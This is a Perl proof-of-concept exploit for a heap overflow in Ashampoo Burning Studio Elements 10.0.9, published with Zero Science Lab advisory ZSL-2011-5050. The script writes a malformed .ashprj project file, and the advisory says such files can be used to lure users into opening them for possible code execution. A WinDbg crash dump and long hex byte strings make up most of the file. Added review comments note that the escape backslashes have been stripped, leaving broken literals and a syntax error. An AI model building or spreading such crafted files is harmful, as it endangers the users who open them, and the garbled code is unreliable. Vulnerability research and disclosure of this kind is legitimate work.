
# Title : Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow
# Published : 2011-10-04
# Author :


#!/usr/bin/perl
#
#
# Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability
#
#
# Vendor: Ashampoo GmbH & Co. KG
# Product web page: http://www.ashampoo.com
# Affected version: 10.0.9
#
# Summary: Ashampoo Burning Studio Elements offers you everything you need to
# burn movies, music and data - fast and effectively. The software with the
# intuitive user interface focuses on the core competencies of burning software
# and offers you compact functions to tackle all tasks relating to your burning
# projects - easily create data discs, burn backups, rip music, create audio CDs
# or burn already existing film files on Blu-ray Disc and lots more.
#
# Desc: The application suffers from a heap overflow vulnerability because it
# fails to properly sanitize user supplied input when parsing .ashprj project
# file format resulting in a crash corrupting the heap-based memory. The
# attacker can use this scenario to lure unsuspecting users to open malicious
# crafted .ashprj files with a potential for arbitrary code execution on the
# affected system.
#
# ---------------------------------------------------------------------------
#
# HEAP[burningstudioelements.exe]: Heap block at 051F7F08 modified at 051F7F86 past requested size of 76
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f86 ecx=7c91d4fd edx=00f1eca5 esi=051f7f08 edi=00000076
# eip=7c90120e esp=00f1eea8 ebp=00f1eeac iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:000> g
# HEAP[burningstudioelements.exe]: Invalid Address specified to RtlFreeHeap( 01A70000, 051F7F10 )
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f08 ecx=7c91d4fd edx=00f1ecb6 esi=01a70000 edi=051f7f08
# eip=7c90120e esp=00f1eec0 ebp=00f1eec4 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:000> d edi
# 051f7f08  12 00 06 00 02 07 1a 01-01 00 00 00 e8 5c a0 e6  ...............
# 051f7f18  cb f9 c3 b3 0c e8 5c a0-e6 cb 41 42 41 42 41 42  .........ABABAB
# 051f7f28  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f38  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f48  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f58  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f68  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f78  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 ab  ABABABABABABABA.
#
# ---------------------------------------------------------------------------
#
#
# Tested on: Microsoft Windows XP Pro SP3 (En)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2011-5050
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5050.php
#
#
# 28.09.2011
#


use strict;
# NOTE(review): `use warnings;` is absent, so nothing at run time points at the
# odd literals below (see the note on the escape backslashes further down).

# Runs the shell command `color 80` (a cmd.exe console-colour builtin), so the
# script assumes a Windows console; elsewhere the command simply fails, and the
# failure is ignored because the return value is not checked.
system("color 80");

# Name of the project file this PoC writes into the current directory.
my $filefm = "Aodrulez.ashprj"; # ;)

# Prints the advisory banner (sub defined at the bottom of the file). The
# `&name;` call form also forwards the caller's @_; harmless here, but the
# plain `banner();` form is the idiom.
&banner;
# NOTE(review): throughout this listing every "n", "t" and "xNN" appears with
# its escape backslash stripped, so as shown these literals contain the bare
# letters rather than newlines, tabs or hex bytes; the original source
# presumably read "\n", "\t", "\x41" and so on.
print "nThis PoC script will create the $filefm file!nn";
# cmd.exe builtin: waits for a keypress before anything is written to disk.
system("pause");

# Filler placed between the fixed header and footer below; it is the source of
# the repeating "ABAB" pattern in the heap dump quoted in the file header. As
# listed, the repeated unit is the 6-character text "x41x42", not two bytes.
my $buffer = "x41x42" x 50000;

# Fixed leading bytes of the .ashprj image; the trailing comment on the first
# line is the author's own note about a byte taken out of the original file.
my $header = "x61x73x68x70x72x6Ax00x00x0Ax00x00x00x00x00x00x56". #0x03 (ETX) removed.
             "x45x52x53x08x00x00x00x00x00x00x00x02x00x00x00x01".
             "x00x00x00x66x50x52x4AxEAx02x00x00x00x00x00x00x49".
             "x44x00x00x20x00x00x00x00x00x00x00x70x00x72x00x6F".
             "x00x6Ax00x65x00x63x00x74x00x2Ex00x64x00x61x00x74".
             "x00x61x00x64x00x69x00x73x00x63x00x66x50x50x53x00".
             "x00x00x00x00x00x00x00x66x50x52x4Dx10x00x00x00x00".
             "x00x00x00x46x4Cx41x47x04x00x00x00x00x00x00x00x00".
             "x00x00x00x66x43x4Dx50x56x02x00x00x00x00x00x00x54".
             "x59x50x45x08x00x00x00x00x00x00x00x44x00x61x00x74".
             "x00x61x00x66x50x50x53x00x00x00x00x00x00x00x00x66".
             "x46x53x00x88x00x00x00x00x00x00x00x46x53x00x00x36".
             "x00x00x00x00x00x00x00x44x00x69x00x73x00x63x00x54".
             "x00x79x00x70x00x65x00x41x00x70x00x70x00x72x00x6F".
             "x00x70x00x72x00x69x00x61x00x74x00x65x00x2Ex00x50".
             "x00x72x00x69x00x6Dx00x61x00x72x00x79x00x46x53x00".
             "x00x3Ax00x00x00x00x00x00x00x44x00x69x00x73x00x63".
             "x00x54x00x79x00x70x00x65x00x41x00x70x00x70x00x72".
             "x00x6Fx00x70x00x72x00x69x00x61x00x74x00x65x00x2E".
             "x00x53x00x65x00x63x00x6Fx00x6Ex00x64x00x61x00x72".
             "x00x79x00x4Cx41x42x4Cx10x00x00x00x00x00x00x00x4D".
             "x00x79x00x20x00x46x00x69x00x6Cx00x65x00x73x00x66".
             "x4Bx49x44x7Ax01x00x00x00x00x00x00x66x46x44x52x6E".
             "x01x00x00x00x00x00x00x66x4Ex4Fx44xC7x00x00x00x00".
             "x00x00x00x48x45x41x44x1Fx00x00x00x00x00x00x00x00".
             "x00x00x00x80xEBx8Cx96x7Dx35xE1xB3x0Cx80xEBx8Cx96".
             "x7Dx35xE1xB3x0Cx80xEBx8Cx96x7Dx35xE1xB3x0Cx4Ex41".
             "x4Dx45x08x00x00x00x00x00x00x00x52x00x6Fx00x6Fx00".
             "x74x00x44x53x52x43x7Cx00x00x00x00x00x00x00x00x00".
             "x00x00x74x00x00x00x66x00x69x00x6Cx00x65x00x3Ax00".
             "x2Fx00x2Fx00x2Fx00x43x00x3Ax00x2Fx00x44x00x6Fx00".
             "x63x00x75x00x6Dx00x65x00x6Ex00x74x00x73x00x25x00".
             "x32x00x30x00x61x00x6Ex00x64x00x25x00x32x00x30x00".
             "x53x00x65x00x74x00x74x00x69x00x6Ex00x67x00x73x00".
             "x2Fx00x41x00x6Cx00x6Cx00x25x00x32x00x30x00x55x00".
             "x73x00x65x00x72x00x73x00x2Fx00x44x00x65x00x73x00".
             "x6Bx00x74x00x6Fx00x70x00x2Fx00x66x4Bx49x44x8Fx00".
             "x00x00x00x00x00x00x66x4Cx45x46x83x00x00x00x00x00".
             "x00x00x66x4Ex4Fx44x77x00x00x00x00x00x00x00x48x45".
             "x41x44x27x00x00x00x00x00x00x00x01x00x00x00xE8x5C".
             "xA0xE6xCBxF9xC3xB3x0CxE8x5CxA0xE6xCB";

# Fixed trailing bytes of the .ashprj image, appended after the filler.
my $footer = "xF9xC3xB3x0Cx28x80xBAxA7x70x35xE1xB3x0Cx50x02x00".
             "x00x00x00x00x00x4Ex41x4Dx45x12x00x00x00x00x00x00".
             "x00x4Ax00x6Fx00x78x00x79x00x31x00x2Ex00x6Cx00x6E".
             "x00x6Bx00x44x53x52x43x1Ax00x00x00x00x00x00x00x3A".
             "x00x00x00x12x00x00x00x4Ax00x6Fx00x78x00x79x00x31".
             "x00x2Ex00x6Cx00x6Ex00x6Bx00x66x43x4Dx50x28x00x00".
             "x00x00x00x00x00x54x59x50x45x10x00x00x00x00x00x00".
             "x00x45x00x6Cx00x54x00x6Fx00x72x00x69x00x74x00x6F".
             "x00x66x50x50x53x00x00x00x00x00x00x00x00";

# Complete file image: header, filler, footer, in that order.
my $fringe = $header.$buffer.$footer;

print "n - Preparing to write to file...n";
sleep 1;    # cosmetic pause only
# NOTE(review): bareword handle `prj` and 2-arg open with the mode folded into
# the filename string. $filefm is a fixed literal here, so no mode injection
# is possible, but the 3-arg form `open my $fh, '>', "./$filefm" or die ...`
# is the idiom to use. The parentheses keep `||` bound to open's result, so
# the usual `||`-precedence trap does not apply on this line.
open (prj, ">./$filefm") || die "nCan't open $filefm: $!";
print "n - Writing to file...n";
print prj $fringe;
# NOTE(review): close is unchecked, so a failed buffered write would go
# unnoticed and the "successfully crafted" message below would still print.
close (prj);
sleep 2;    # cosmetic pause only
# NOTE(review): as listed, the inner quotes around $filefm are unescaped, which
# makes this line a syntax error; the source presumably had \"$filefm\".
print "n - File "$filefm" successfully crafted!nn - t00t!n";

# Prints the fixed advisory banner to the currently selected output handle.
# The literals are reproduced exactly as they appear in this listing, where
# the escape backslashes have been stripped ("n"/"t" stand where "\n"/"\t"
# would be expected), so the output is byte-identical to the original sub.
# Returns whatever print returns, as the original did.
sub banner {
    my $rule = '_' x 51;
    my @parts = (
        'n',
        $rule,
        'nn Ashampoo Burning Studio Elements 10 Heap Overflownn',
        'tCopyleft (c) 2011 - Zero Science Labnn',
        'ttID: ZSL-2011-5050nn',
        $rule,
        'n',
    );
    return print join '', @parts;
}

#EOF